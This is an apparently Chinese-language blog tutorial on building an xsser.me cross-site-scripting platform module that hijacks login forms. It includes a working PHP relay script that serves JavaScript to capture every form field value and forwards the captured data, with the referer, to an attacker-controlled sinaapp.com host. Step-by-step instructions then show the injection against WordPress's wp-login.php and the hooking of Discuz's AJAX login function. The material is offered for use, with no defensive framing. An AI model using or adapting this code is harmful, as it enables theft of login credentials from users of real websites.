平台基于xsser.me for sae http://xsserme.sinaapp.com/download.php
模块编写
新建模块 如下图
因为里面逻辑判断和数据转化较多 需要个php脚本来转发
php转发脚本代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52
| 转发文件的源码为:
<?php
ini_set('display_errors', 'Off'); $id=$_GET['id']; if($_GET['y']){
$funcname=$_GET['funcname']; $formname='"'.$_GET['formname'].'"'; $formid='"'.$_GET['formid'].'"';
echo " var xurl='http://xxx.sinaapp.com/xxxxx/xform.php?id={$id}'; var form= ( $formname ) ? document.forms[$formname] : document.getElementById($formid);
";
if($funcname){
echo 'function getForm(e){var t,n="",r="",i,s;for(t=0;t<e.length;t++){i=e[t];if(i.name!=""){if(i.type=="select-one")s=i.options[i.selectedIndex].value;else if(i.type=="checkbox"||i.type=="radio"){if(i.checked==0)continue;s=i.value}else{if(i.type=="button"||i.type=="submit"||i.type=="reset"||i.type=="image")continue;s=i.value}s=encodeURIComponent(s),n+=r+i.name+"="+s,r="&"}}return n} '." $funcname=xss.proxy($funcname,function(){ xss.ajax(xurl,getForm(form));
})" ;
}else{
echo 'xss.xform(form,xurl);';
}
}else{
$url=$_SERVER['HTTP_REFERER']; $data=""; foreach($_REQUEST as $k=>$v){
$data.="|$k=$v";
}
file_get_contents("http://xxx.sinaapp.com/index.php?do=api&id={$id}&data={$data}&url={$url}");
}
?>
|
注:里面javascript代码基于 xss.js库 地址:http://pujun.li/xss.js sogili
使用演示
一:普通表单提交 (wordpress 示范)
利用表单劫持实现
第一步:新建项目 选择 xss.js模块 和通用明文记录填写配置
以wordpress为例 看后台登陆表单:
1
| <form name="loginform" id="loginform" action="" method="post">
|
第二步:插入xss 代码 wp-login.php
第三步:爆菊
ajax提交表单 (discuz 示范)
利用函数劫持实现
第一步:新建项目 选择 xss.js模块 和通用明文记录填写配置
以discuz 为例 看登陆表单:
http://w/uauc/dg2.5/member.php?mod=logging&action=login
1
| <form method="post" autocomplete="off" name="login" id="loginform_LIsAS" class="cl" onsubmit="pwdclear = 1;ajaxpost('loginform_LIsAS', 'returnmessage_LIsAS', 'returnmessage_LIsAS', 'onerror');return false;" action="member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;loginhash=LIsAS">
|
创建项目
演示视频
视频地址:http://v.youku.com/v_show/id_XNTY0NTk1NzY0.html (可选择高清全屏观看)
高清无码: http://pan.baidu.com/share/link?shareid=484431&uk=587894688
后言
Xsser 程序确实比较强大,本文只是抛砖引玉,大家可以参考本文diy各种猥琐模块…..